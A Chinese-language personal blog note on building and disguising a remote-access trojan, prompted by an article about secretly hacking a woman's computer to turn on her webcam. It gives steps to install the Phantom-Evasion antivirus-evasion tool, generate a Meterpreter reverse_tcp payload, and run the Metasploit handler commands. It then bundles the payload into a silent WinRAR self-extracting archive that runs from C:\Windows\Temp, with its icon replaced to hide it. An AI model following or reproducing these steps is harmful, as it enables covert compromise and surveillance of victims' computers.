Phantom-Evasion免杀以及WinRAR自解压捆绑学习笔记

公众号看到一篇文章《一次渗透妹子电脑开摄像头全过程》，有点好玩但是现在已经删了hhhh，想试一下这个免杀工具和捆绑方式。

 

一、Phantom-Evasion工具安装

下载地址：https://github.com/oddcod3/Phantom-Evasion

在 kali 下载源码后

pip3 install pyopenssl 命令安装 openssl 包

python3 phantom-evasion.py --setup 命令自动配置工具

出现 module 'OpenSSL.crypto' has no attribute 'PKCS12Type' 报错时在 Phantom-Evasion/Setup/Phantom_lib.py 中将 PKCS12Type 替换成 PKCS12

 

二、生成msf马

选择 windows 模块、tcp 反弹，按提示配置框架、ip、端口等选项

 

生成马后开启监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport 5555
exploit

 

还没捆绑直接拿范师傅刘师傅和大佬测试一下，哦豁，除了迈克菲阻止了，都成功上线了。但是开摄像头失败，暂时不知道是什么原因

 

三、WinRAR自解压方式捆绑

打开WinRAR->选中两个文件->命令->添加文件到压缩文件中->创建自解压格式压缩文件

 

高级->自解压选项->填写解压后路径->C:\Windows\Temp（系统的缓存文件路径）

设置->设置程序提取后运行 C:\Windows\Temp\test.exe

模式->静默模式->隐藏启动对话框

更新->更新方式\覆盖方式->解压并更新文件\覆盖所有文件->确定

再进行图标替换就完美了，使用 Restorator 工具，下载地址：https://www.jb51.net/softs/619405.html

 

 

参考文章：

https://www.cnblogs.com/caihon/p/13957013.html

https://tieba.baidu.com/p/2839032849?red_tag=2074930780